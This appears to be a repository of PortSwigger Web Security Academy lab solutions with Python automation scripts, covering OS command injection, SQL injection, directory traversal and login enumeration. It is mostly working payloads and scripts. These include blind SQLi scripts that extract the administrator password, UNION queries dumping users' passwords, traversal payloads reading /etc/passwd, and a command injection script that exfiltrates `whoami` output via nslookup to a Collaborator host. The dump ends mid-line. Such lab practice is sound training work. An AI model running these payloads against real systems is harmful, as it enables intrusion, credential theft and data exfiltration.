├── README.md ├── Command Injection ├── Scripts │ ├── Blind (Redirecting output) │ │ ├── README.md │ │ └── script.py │ ├── Blind (Time delays) │ │ ├── README.md │ │ └── script.py │ ├── Blind (OAST) │ │ ├── README.md │ │ └── script.py │ ├── Blind (OAST data exfiltration) │ │ ├── README.md │ │ └── script.py │ └── Simple Case │ │ ├── script.py │ │ └── README.md ├── (PRACTITIONER) Lab : Blind OS command injection with time delays.md ├── (APPRENTICE) Lab : OS command injection, simple case.md ├── (PRACTITIONER) Lab : Blind OS command injection with output redirection.md ├── (PRACTITIONER) Lab : Blind OS command injection with out-of-band interaction.md └── (PRACTITIONER) Lab : Blind OS command injection with out-of-band data exfiltration.md ├── SQL injection ├── (PRACTITIONER) Lab : Blind SQL injection with time delays.md ├── (APPRENTICE) Lab : SQL injection vulnerability allowing login bypass.md ├── Scripts │ ├── For Microsoft OR MySQL Database │ │ ├── README.md │ │ └── script.py │ ├── For Oracle Database │ │ ├── README.md │ │ └── script.py │ └── Blind SQLi │ │ ├── triggeringConditionalResponses.py │ │ ├── triggeringConditionalErrors.py │ │ └── usingTimeDelay.py ├── (PRACTITIONER) Lab : SQL injection UNION attack, retrieving data from other tables.md ├── (PRACTITIONER) Lab : SQL injection attack, querying the database type and version on MySQL and Microsoft.md ├── (PRACTITIONER) Lab : SQL injection UNION attack, retrieving multiple values in a single column.md ├── (APPRENTICE) Lab : SQL injection vulnerability in WHERE clause allowing retrieval of hidden data.md ├── (PRACTITIONER) Lab : SQL injection UNION attack, finding a column containing text.md ├── (PRACTITIONER) Lab : SQL injection attack, listing the database contents on non-Oracle databases.md ├── (PRACTITIONER) Lab : SQL injection UNION attack, determining the number of columns returned by the query.md ├── (PRACTITIONER) Lab : SQL injection attack, querying the database type and version on Oracle.md ├── (PRACTITIONER) Lab : Blind SQL injection with out-of-band interaction.md ├── (PRACTITIONER) Lab : Blind SQL injection with out-of-band data exfiltration.md ├── (PRACTITIONER) Lab : Blind SQL injection with conditional responses.md ├── (APPRENTICE) Lab : Blind SQL injection with conditional errors.md └── (PRACTITIONER) Lab : Blind SQL injection with time delays and information retrieval.md ├── Directory traversal ├── (PRACTITIONER) Lab : File path traversal, validation of start of path.md ├── Script │ ├── script.py │ ├── README.md │ └── dirlist.txt ├── (PRACTITIONER) Lab: File path traversal, traversal sequences blocked with absolute path bypass.md ├── (PRACTITIONER) Lab : File path traversal, traversal sequences stripped non-recursively.md ├── (PRACTITIONER) Lab : File path traversal, validation of file extension with null byte bypass.md ├── (APPRENTICE) Lab: File path traversal, simple case.md └── (PRACTITIONER) Lab : File path traversal, traversal sequences stripped with superfluous URL-decode.MD └── Authentication vulnerabilities └── Vulnerabilities in password-based login ├── Scripts ├── Username enumeration via different responses │ ├── README.md │ ├── script.py │ ├── usernames.txt │ └── passwords.txt └── Username enumeration via subtly different responses │ ├── README.md │ ├── script.py │ ├── usernames.txt │ └── passwords.txt ├── Username enumeration via different responses.md ├── Username enumeration via subtly different responses.md └── Username enumeration via response timing.md /README.md: -------------------------------------------------------------------------------- 1 | # PortSwigger 2 | 3 | This repository includes the solution for Portswigger Labs and also scripts for the automation of the labs. 4 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (Redirecting output)/README.md: -------------------------------------------------------------------------------- 1 | ### USAGE: 2 | ```bash 3 | python3 script.py https://ac241f0f1e93147bc00807e5002d0002.web-security-academy.net/ 4 | ``` 5 | Output: 6 | ```bash 7 | peter-QkDZWU 8 | ``` 9 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : Blind SQL injection with time delays.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the TrackingId cookie, changing it to: 2 | 3 | ```sql 4 | TrackingId=x'||pg_sleep(10)-- 5 | ``` 6 | ` || ` is concatenation operator. 7 | -------------------------------------------------------------------------------- /Command Injection/(PRACTITIONER) Lab : Blind OS command injection with time delays.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the request that submits feedback: 2 | 3 | Modify the email address changing it to: 4 | ``` 5 | b||ping+-c+10+127.0.0.1|| 6 | ``` 7 | -------------------------------------------------------------------------------- /SQL injection/(APPRENTICE) Lab : SQL injection vulnerability allowing login bypass.md: -------------------------------------------------------------------------------- 1 | - Go to my account. 2 | - in the login form, fill username = `administrator' or 1=1 --` and anything in password field. 3 | - You will get the `administrator` access to the account. 4 | 5 | -------------------------------------------------------------------------------- /SQL injection/Scripts/For Microsoft OR MySQL Database/README.md: -------------------------------------------------------------------------------- 1 | ### This script has the following functionalities: 2 | 3 | ```bash 4 | 1. Find number of Columns using 'ORDER BY' 5 | 2. Find number of Columns using 'UNION SELECT' 6 | 3. Find columns that contains text 7 | 4. Find type and version of database 8 | ``` 9 | -------------------------------------------------------------------------------- /SQL injection/Scripts/For Oracle Database/README.md: -------------------------------------------------------------------------------- 1 | ### This script has the following functionalities: 2 | 3 | ```bash 4 | 1. Find number of Columns using 'ORDER BY' 5 | 2. Find number of Columns using 'UNION SELECT' 6 | 3. Find columns that contains text 7 | 4. Find type and version of database 8 | ``` 9 | 10 | 11 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, retrieving data from other tables.md: -------------------------------------------------------------------------------- 1 | Firstly, Determine the number of columns that are being returned by the query and which columns contain text data same as we done in previous labs. 2 | 3 | Now, use Payload: 4 | ```sql 5 | 'UNION SELECT username,password FROM users--+ 6 | ``` 7 | -------------------------------------------------------------------------------- /Command Injection/(APPRENTICE) Lab : OS command injection, simple case.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the storeID parameter, changing it to: 2 | 3 | ``` 4 | 1 | whoami 5 | ``` 6 | 7 | ` | ` is pipe operator. 8 | 9 | Eg. `A|B` A and B are executed in parallel, and the standard output of A is sent as the standard input of B. 10 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (Time delays)/README.md: -------------------------------------------------------------------------------- 1 | ### USAGE : 2 | ```bash 3 | python3 script.py https://ac041faf1e98ea44c038053c00a8006d.web-security-academy.net/ 4 | ``` 5 | Output: 6 | ``` 7 | delay = 10.767915487289429 8 | Attack succcessful with Testing Payload : b||ping -c 10 127.0.0.1|| 9 | ``` 10 | 11 | __You can change payload according to your convinience.__ 12 | -------------------------------------------------------------------------------- /Directory traversal/(PRACTITIONER) Lab : File path traversal, validation of start of path.md: -------------------------------------------------------------------------------- 1 | Use the payload: 2 | ``` 3 | /var/www/images/../../../etc/passwd 4 | ``` 5 | 6 | Note: If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences. 7 | -------------------------------------------------------------------------------- /Directory traversal/Script/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | 5 | if len(sys.argv) != 2: 6 | print(f"USAGE: {sys.argv[0]} domain") 7 | sys.exit(1) 8 | 9 | URL = sys.argv[1] 10 | 11 | f=open("dirlist.txt","r") 12 | 13 | for l in f: 14 | payload = URL+l.strip() 15 | response=requests.get(payload) 16 | print(f"HTTP Status Code : {response.status_code} || Testing Path : {l}",end="") 17 | time.sleep(1) 18 | -------------------------------------------------------------------------------- /Command Injection/(PRACTITIONER) Lab : Blind OS command injection with output redirection.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the request that submits feedback: 2 | 3 | Modify the email address changing it to: 4 | ``` 5 | b||whoami>/var/www/images/whoami.txt|| 6 | ``` 7 | Next, intercept the request that contains an image and change the filname to whoami.txt in the request: 8 | ``` 9 | GET /image?filename=whoami.txt HTTP/1.1 10 | ``` 11 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection attack, querying the database type and version on MySQL and Microsoft.md: -------------------------------------------------------------------------------- 1 | Firstly, Determine the number of columns `'UNION SELECT NULL,NULL--+` that are being returned by the query and which columns contain text data `'UNION SELECT 'a','a'--+` same as we done in previous labs. 2 | 3 | Now, for querying the database type and version on MySQL and Microsoft, we may use: 4 | ``` 5 | 'UNION SELECT @@version,NULL--+ 6 | ``` 7 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (OAST)/README.md: -------------------------------------------------------------------------------- 1 | **Step 1** : Open `Burp Collaborator Client` and copy the subdomain. 2 | 3 | **Step 2** : Run `script.py`. Eg: 4 | ```bash 5 | python3 script.py https://ac401feb1e4e7675c0909bba005f00c7.web-security-academy.net/ 0gh58enmj0vxz279gzeagsoad1jr7g.burpcollaborator.net 6 | ``` 7 | Output: 8 | ``` 9 | Poll now!! 10 | ``` 11 | 12 | **Step 3** : Go to Burp Collaborator, and press 'Poll now' to confirm that a DNS lookup occurred. 13 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (OAST data exfiltration)/README.md: -------------------------------------------------------------------------------- 1 | **Step 1** : Open `Burp Collaborator Client` and copy the subdomain. 2 | 3 | **Step 2** : Run `script.py`. Eg: 4 | ```bash 5 | python3 script.py https://ac401feb1e4e7675c0909bba005f00c7.web-security-academy.net/ 0gh58enmj0vxz279gzeagsoad1jr7g.burpcollaborator.net 6 | ``` 7 | Output: 8 | ``` 9 | Poll now!! 10 | ``` 11 | 12 | **Step 3** : Go to Burp Collaborator, and press 'Poll now' to confirm that a DNS lookup occurred. 13 | -------------------------------------------------------------------------------- /Directory traversal/Script/README.md: -------------------------------------------------------------------------------- 1 | You may run the script like: 2 | ``` 3 | python3 script.py https://acc31fd21e19b251c0e1072b00a2000b.web-security-academy.net/image?filename= 4 | ``` 5 | If you want to print output with status_code = 200 only. You may run the script like: 6 | ``` 7 | python3 script.py https://acc31fd21e19b251c0e1072b00a2000b.web-security-academy.net/image?filename= | grep 200 8 | ``` 9 | 10 | PS: You can change the "dirlist.txt" according to your convenience and requirements. 11 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, retrieving multiple values in a single column.md: -------------------------------------------------------------------------------- 1 | Firstly, Determine the number of columns that are being returned by the query and which columns contain text data same as we done in previous labs. 2 | 3 | Now, use Payload: 4 | ```sql 5 | ' UNION SELECT NULL,username||'~'||password FROM users-- 6 | ``` 7 | 8 | - Double pipe sequence (||) is string concatenation operator in Oracle. And tilde is used to separate the multiple values in one column. 9 | -------------------------------------------------------------------------------- /Command Injection/(PRACTITIONER) Lab : Blind OS command injection with out-of-band interaction.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the request that submits feedback: 2 | 3 | Open `Burp Collaborator Client` and copy the subdomain. I this case : `u0vaih5wnq6mdj00bv3gjzudx43urj.burpcollaborator.net` 4 | 5 | Modify the email address changing it to: 6 | ``` 7 | b||nslookup+u0vaih5wnq6mdj00bv3gjzudx43urj.burpcollaborator.net|| 8 | ``` 9 | 10 | Send it. 11 | 12 | Now go to Burp Collaborator, and press 'Poll now' to confirm that a DNS lookup occurred. 13 | -------------------------------------------------------------------------------- /Directory traversal/(PRACTITIONER) Lab: File path traversal, traversal sequences blocked with absolute path bypass.md: -------------------------------------------------------------------------------- 1 | Use the following payload: 2 | ``` 3 | https://acea1f6d1f57fc7bc05a8c5600750075.web-security-academy.net/image?filename=/etc/passwd 4 | ``` 5 | 6 | Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. You might be able to use an absolute path from the filesystem root, such as `filename=/etc/passwd`, to directly reference a file without using any traversal sequences. 7 | -------------------------------------------------------------------------------- /Directory traversal/(PRACTITIONER) Lab : File path traversal, traversal sequences stripped non-recursively.md: -------------------------------------------------------------------------------- 1 | Use the following payload: 2 | ``` 3 | https://ac631f491ff3ef5dc03220e000790093.web-security-academy.net/image?filename=....//....//....//etc/passwd 4 | ``` 5 | Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. You might be able to use nested traversal sequences, such as `....//` or `....\/`, which will revert to simple traversal sequences when the inner sequence is stripped. 6 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Simple Case/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | 5 | if len(sys.argv) != 2: 6 | print(f"USAGE: {sys.argv[0]} domain") 7 | sys.exit(1) 8 | 9 | URL = sys.argv[1] 10 | 11 | f=open("dictionary.txt","r") 12 | path="product/stock/" 13 | for l in f: 14 | urli = URL+path 15 | payload='1'+ l.strip() 16 | data = {'productId':'1','storeId': payload} 17 | response = requests.post(url=urli,data=data) 18 | if 'not found' not in response.text: 19 | print(f"Response : {(response.text).strip()} || Testing Payload : {l}",end="") 20 | time.sleep(1) 21 | -------------------------------------------------------------------------------- /Directory traversal/(PRACTITIONER) Lab : File path traversal, validation of file extension with null byte bypass.md: -------------------------------------------------------------------------------- 1 | Intercept the request using Bupsuite and use the payload: 2 | ``` 3 | ../../../etc/passwd%00.jpg 4 | ``` 5 | 6 | Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques.If an application requires that the user-supplied filename must end with an expected file extension, such as .png, then it might be possible to use a null byte to effectively terminate the file path before the required extension. 7 | -------------------------------------------------------------------------------- /SQL injection/(APPRENTICE) Lab : SQL injection vulnerability in WHERE clause allowing retrieval of hidden data.md: -------------------------------------------------------------------------------- 1 | - Select the one of the categories given. 2 | - Then observe the URL. 3 | `https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle` 4 | 5 | For unreleased data of the selected filter: `category=Lifestyle' --` 6 | ``` 7 | https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle' -- 8 | ``` 9 | To display all the products in any category, including categories that they wasn't mentioned: `category=Lifestyle'+OR+1=1 --` 10 | ``` 11 | https://ac4f1f9d1f9cf661c0753d4600e1005a.web-security-academy.net/filter?category=Lifestyle%27+OR+1=1%20-- 12 | ``` 13 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, finding a column containing text.md: -------------------------------------------------------------------------------- 1 | First find the number of columns as we did in Lab 1, then do the following. 2 | 3 | Generally, the interesting data that you want to retrieve will be in string form. Having already determined the number of required columns, you can probe each column to test whether it can hold string data by replacing one of the UNION SELECT payloads with a string value. In previous lab you would submit: 4 | 5 | ' UNION SELECT 'a',NULL,NULL-- 6 | ' UNION SELECT NULL,'a',NULL-- 7 | ' UNION SELECT NULL,NULL,'a'-- 8 | 9 | Payload 10 | ```sql 11 | ' UNION SELECT NULL,'Tz0F22',NULL-- 12 | ``` 13 | 14 | 15 | -------------------------------------------------------------------------------- /Directory traversal/(APPRENTICE) Lab: File path traversal, simple case.md: -------------------------------------------------------------------------------- 1 | Use the following payload: 2 | ``` 3 | https://acd21f2c1ec584c7c0a59582003100c1.web-security-academy.net/image?filename=../../../etc/passwd 4 | ``` 5 | Note : The image files themselves are stored on disk in the location `/var/www/images/`. The application implements no defenses against directory traversal attacks, so an attacker can request the following URL to retrieve an arbitrary file from the server's filesystem. The sequence `../` is valid within a file path, and means to step up one level in the directory structure. The three consecutive `../` sequences step up from `/var/www/images/` to the filesystem root, and so the file that is actually read is: `/etc/passwd` 6 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via different responses/README.md: -------------------------------------------------------------------------------- 1 | **Usage** : 2 | ``` 3 | python3 auth1p2.py https://acd51fbb1f1bc668c1e5121b00000006.web-security-academy.net/ 4 | ``` 5 | Sample Output: 6 | ``` 7 | Trying [username : carlos] 8 | Trying [username : root] 9 | Trying [username : admin] 10 | Trying [username : test] 11 | Trying [username : guest] 12 | . 13 | . 14 | . 15 | . 16 | . 17 | Trying [username : appserver] 18 | Trying [username : aq] 19 | 20 | Correct username : aq 21 | 22 | Trying [username : aq | password : 123456] 23 | Trying [username : aq | password : password] 24 | . 25 | . 26 | . 27 | . 28 | . 29 | Trying [username : aq | password : austin] 30 | Trying [username : aq | password : thunder] 31 | Attack successful 32 | Correct Credentials => [username : aq | password : thunder] 33 | ``` 34 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection attack, listing the database contents on non-Oracle databases.md: -------------------------------------------------------------------------------- 1 | First, Determine the number of columns `'UNION SELECT NULL,NULL--+`. 2 | 3 | Next, find which column(s) contain text data `'UNION SELECT 'a','a'--+`. 4 | 5 | Next, Find the database type and version `'UNION SELECT version(),'a'--+` which is `PostgreSQL` in this case. 6 | 7 | Find the **database contents** using: 8 | To find table names: 9 | ``` 10 | 'UNION SELECT table_name,NULL FROM information_schema.tables 11 | 12 | ``` 13 | To find column names: 14 | ``` 15 | 'UNION SELECT column_name,NULL FROM information_schema.columns where table_name='users_otycqm'-- 16 | ``` 17 | To find username and password: 18 | ``` 19 | 'UNION SELECT username_wkltbr,password_ccjuel FROM users_otycqm-- 20 | ``` 21 | Now, you will get the credentials, login for administrator account. 22 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Simple Case/README.md: -------------------------------------------------------------------------------- 1 | ### USAGE : 2 | ```bash 3 | python3 script.py https://ac141fd61efc6bd8c0e80e65002500f0.web-security-academy.net/ 4 | ``` 5 | Output will be something like: 6 | ```bash 7 | Response : sh: 1: Syntax error: end of file unexpected || Testing Payload : /index.html|id| 8 | Response : 62 9 | uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id; 10 | Response : 62 11 | uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id 12 | Response : 62 13 | uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : ;id; 14 | Response : uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : |id 15 | Response : uid=12001(peter-MJTGDs) gid=12001(peter) groups=12001(peter) || Testing Payload : |/usr/bin/id 16 | . 17 | . 18 | . 19 | . 20 | . 21 | ``` 22 | -------------------------------------------------------------------------------- /Authentication vulnerabilities/Vulnerabilities in password-based login/Scripts/Username enumeration via subtly different responses/README.md: -------------------------------------------------------------------------------- 1 | **Usage** : 2 | ``` 3 | python3 auth1p2.py https://acd51fbb1f1bc668c1e5121b00000006.web-security-academy.net/ 4 | ``` 5 | Sample Output: 6 | ``` 7 | Trying [username : carlos] 8 | Trying [username : root] 9 | Trying [username : admin] 10 | Trying [username : test] 11 | Trying [username : guest] 12 | . 13 | . 14 | . 15 | . 16 | . 17 | Trying [username : admins] 18 | Trying [username : ads] 19 | 20 | Correct username : ads 21 | 22 | Trying [username : aq | password : 123456] 23 | Trying [username : aq | password : password] 24 | . 25 | . 26 | . 27 | . 28 | . 29 | Trying [username : ads | password : football] 30 | Trying [username : ads | password : monkey] 31 | Attack successful 32 | Correct Credentials => [username : ads | password : monkey] 33 | ``` 34 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (OAST)/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | from bs4 import BeautifulSoup 5 | 6 | if len(sys.argv) != 3: 7 | print(f"USAGE: {sys.argv[0]} {sys.argv[1]} domain burp_collaborator_client") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | client = sys.argv[2] 12 | 13 | path="feedback" 14 | url = URL+path 15 | response = requests.get(url) 16 | 17 | soup = BeautifulSoup(response.content, "html.parser") 18 | csrftoken = soup.find('input', dict(name='csrf'))['value'] 19 | 20 | path="feedback/submit" 21 | urli = URL+path 22 | sess_cookie = response.cookies["session"] 23 | 24 | payload='b||nslookup '+client+'||' 25 | #print(payload) 26 | 27 | data = {'csrf':csrftoken,'name':'abc','email':payload,'subject':'ghi','message':'jkl'} 28 | response = requests.post(url=urli,data=data,headers={"Cookie": "session="+sess_cookie}) 29 | print("Poll now!!") 30 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (OAST data exfiltration)/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | from bs4 import BeautifulSoup 5 | 6 | if len(sys.argv) != 3: 7 | print(f"USAGE: {sys.argv[0]} {sys.argv[1]} domain burp_collaborator_client") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | client = sys.argv[2] 12 | 13 | path="feedback" 14 | url = URL+path 15 | response = requests.get(url) 16 | 17 | soup = BeautifulSoup(response.content, "html.parser") 18 | csrftoken = soup.find('input', dict(name='csrf'))['value'] 19 | 20 | path="feedback/submit" 21 | urli = URL+path 22 | sess_cookie = response.cookies["session"] 23 | 24 | payload='b||nslookup `whoami`.'+client+'||' 25 | 26 | data = {'csrf':csrftoken,'name':'abc','email':payload,'subject':'ghi','message':'jkl'} 27 | response = requests.post(url=urli,data=data,headers={"Cookie": "session="+sess_cookie}) 28 | print("Poll now!!") 29 | -------------------------------------------------------------------------------- /Command Injection/(PRACTITIONER) Lab : Blind OS command injection with out-of-band data exfiltration.md: -------------------------------------------------------------------------------- 1 | Intercept the request using `BurpSuite` and then `Modify` the request that submits feedback: 2 | 3 | Open `Burp Collaborator Client` and copy the domain. I this case : `slhdq2dusq3iiuxpdc5jqkr970dr1g.burpcollaborator.net` 4 | 5 | Modify the email address changing it to: 6 | ``` 7 | b||nslookup+`whoami`.slhdq2dusq3iiuxpdc5jqkr970dr1g.burpcollaborator.net|| 8 | ``` 9 | 10 | Send it. 11 | 12 | Now go to Burp Collaborator, and press 'Poll now'. Now you will see some DNS interactions that were initiated by the application as the result of your payload. 13 | 14 | Observe that the output from your command appears in the subdomain of the interaction, and you can view this within the Burp Collaborator client. 15 | 16 | To complete the lab, enter the name of the current user in the `Submit Solution` box on the home page. 17 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (Redirecting output)/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | from bs4 import BeautifulSoup 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} domain") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | path="feedback" 13 | url = URL+path 14 | response = requests.get(url) 15 | 16 | soup = BeautifulSoup(response.content, "html.parser") 17 | csrftoken = soup.find('input', dict(name='csrf'))['value'] 18 | 19 | path="feedback/submit" 20 | urli = URL+path 21 | sess_cookie = response.cookies["session"] 22 | payload='b||whoami>/var/www/images/whoami.txt||' 23 | data = {'csrf':csrftoken,'name':'abc','email':payload,'subject':'ghi','message':'jkl'} 24 | response = requests.post(url=urli,data=data,headers={"Cookie": "session="+sess_cookie}) 25 | path = "image?filename=whoami.txt" 26 | urli = URL+path 27 | response=requests.get(urli) 28 | print(response.text) 29 | -------------------------------------------------------------------------------- /Directory traversal/(PRACTITIONER) Lab : File path traversal, traversal sequences stripped with superfluous URL-decode.MD: -------------------------------------------------------------------------------- 1 | Intercept the request using Bupsuite and use the payload: 2 | ``` 3 | %25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66etc/passwd 4 | ``` 5 | 6 | Note: If an application strips or blocks directory traversal sequences from the user-supplied filename, then it might be possible to bypass the defense using a variety of techniques. 7 | In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters, resulting in %2e%2e%2f or %252e%252e%252f respectively. Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also do the trick. 8 | 9 | For this challenge, we double encoded `../../../` 10 | -------------------------------------------------------------------------------- /Command Injection/Scripts/Blind (Time delays)/script.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import time 4 | from bs4 import BeautifulSoup 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} domain") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | path="feedback" 13 | url = URL+path 14 | response = requests.get(url) 15 | 16 | soup = BeautifulSoup(response.content, "html.parser") 17 | csrftoken = soup.find('input', dict(name='csrf'))['value'] 18 | 19 | print("WAIT for 10 sec") 20 | 21 | path="feedback/submit" 22 | urli = URL+path 23 | sess_cookie = response.cookies["session"] 24 | payload='b||ping -c 10 127.0.0.1||' 25 | data = {'csrf':csrftoken,'name':'abc','email':payload,'subject':'ghi','message':'jkl'} 26 | start=time.time() 27 | response = requests.post(url=urli,data=data,headers={"Cookie": "session="+sess_cookie}) 28 | end=time.time() 29 | delay = end-start 30 | print("delay = ",delay) 31 | if delay>10: 32 | print(f"Attack succcessful with Testing Payload : {payload}") 33 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection UNION attack, determining the number of columns returned by the query.md: -------------------------------------------------------------------------------- 1 | There are exactly two ways to determine the number of columns required in an SQL injection UNION attack 2 | 3 | 1. The first one involves injecting a series of ORDER BY queries until an error occurs. The last value before the error would indicate the number of columns. For example: 4 | 5 | ' ORDER BY 1-- 6 | ' ORDER BY 2-- 7 | ' ORDER BY 3-- 8 | and so on until an error occurs 9 | 2. The second one (most effective in my opinion), would involve submitting a series of UNION SELECT payloads with a number of NULL values. 10 | No error = number of NULL matches the number of columns 11 | ``` 12 | ' UNION SELECT NULL-- 13 | ' UNION SELECT NULL,NULL-- 14 | ' UNION SELECT NULL,NULL,NULL-- 15 | until the error occurs 16 | ``` 17 | 18 | Payload for this lab: 19 | ```sql 20 | ' UNION SELECT NULL,NULL,NULL--+ 21 | 22 | or 23 | 24 | ' ORDER BY 3--+ 25 | ``` 26 | 27 | 28 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : SQL injection attack, querying the database type and version on Oracle.md: -------------------------------------------------------------------------------- 1 | Firstly, Determine the number of columns `'UNION SELECT NULL,NULL FROM dual--` that are being returned by the query and which columns contain text data `'UNION SELECT 'a','a' FROM dual--` same as we done in previous labs. 2 | 3 | To verify the query is returning two columns, and both of which contain text: 4 | `' UNION SELECT 'a','a' FROM DUAL--` 5 | 6 | **Note** : _On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name. 7 | There is a built-in table on Oracle called dual which you can use for this purpose. For example: UNION SELECT 'abc' FROM dual. 8 | DUAL is a table automatically created by Oracle Database along with the data dictionary. DUAL is in the schema of the user SYS but is accessible by the name DUAL to all users._ 9 | 10 | Now, use Payload: 11 | ```sql 12 | ' UNION SELECT BANNER, NULL FROM v$version-- 13 | ``` 14 | _The version information is stored in a table called v$version._ 15 | -------------------------------------------------------------------------------- /SQL injection/(PRACTITIONER) Lab : Blind SQL injection with out-of-band interaction.md: -------------------------------------------------------------------------------- 1 | Step 1 : Intercept the request using BurpSuite Pro. 2 | 3 | Step 2 : Modify the TrackingId cookie, changing it to a payload that will trigger an interaction with the Collaborator server. For example, you can combine SQL injection with basic XXE techniques as follows: 4 | ``` 5 | ' UNION SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual-- 6 | ``` 7 | 8 | Step 3: Go to Burp Collaborator Client and copy the subdomain and paste it in payload. For eg: 9 | ``` 10 | ' union SELECT extractvalue(xmltype(' %remote;]>'),'/l') FROM dual-- 11 | ``` 12 | 13 | Step 4: Copy and paste it after TrakingId Cookie, the URL encode it then send. 14 | 15 | Step 5: Now go to Burp Collaborator, and press 'Poll now' to confirm that a DNS lookup occurred. 16 | 17 | Step 6: You will now see the DNS Lookup. 18 | -------------------------------------------------------------------------------- /SQL injection/Scripts/Blind SQLi/triggeringConditionalResponses.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import string 4 | import time 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} domain") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | dic = string.ascii_letters+string.digits 13 | response = requests.get(URL) 14 | tracking_id = response.cookies["TrackingId"] 15 | sess_cookie = response.cookies["session"] 16 | 17 | def password(url): 18 | 19 | pwd = "" 20 | i = 1 21 | while(True): 22 | found_char = False 23 | print(f"Index : {i}") 24 | for d in dic: 25 | payload = tracking_id + "' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), "+str(i)+", 1) = '" +d 26 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 27 | if "Welcome back!" in response.text: 28 | pwd += d 29 | print(pwd) 30 | found_char = True 31 | break 32 | time.sleep(1) 33 | i+=1 34 | 35 | if not found_char: 36 | print("Password : ",pwd) 37 | break 38 | 39 | password(URL) 40 | -------------------------------------------------------------------------------- /SQL injection/Scripts/Blind SQLi/triggeringConditionalErrors.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import requests 3 | import string 4 | import time 5 | 6 | if len(sys.argv) != 2: 7 | print(f"USAGE: {sys.argv[0]} ") 8 | sys.exit(1) 9 | 10 | URL = sys.argv[1] 11 | 12 | dic = string.ascii_letters+string.digits 13 | response = requests.get(URL) 14 | tracking_id = response.cookies["TrackingId"] 15 | sess_cookie = response.cookies["session"] 16 | 17 | def password(url): 18 | 19 | pwd = "" 20 | i = 1 21 | while(True): 22 | found_char = False 23 | print(f"Index : {i}") 24 | for d in dic: 25 | payload = tracking_id + "' AND (SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'), "+str(i)+",1) = '"+d+"') THEN to_char(1/0) ELSE 'a' END FROM Dual)='a" 26 | response = requests.get(URL, headers={"Cookie":"TrackingId="+payload+"; session="+sess_cookie}) 27 | if "Internal Server Error" in response.text: 28 | pwd += d 29 | print(pwd) 30 | found_char = True 31 | break 32 | time.sleep(1) 33 | i+=1 34 | 35 | if not found_char: 36 | print("Password : ",pwd) 37 | break 38 | 39 | password(URL) 40 | -------------------------------------------------------------------------------- /Authentication 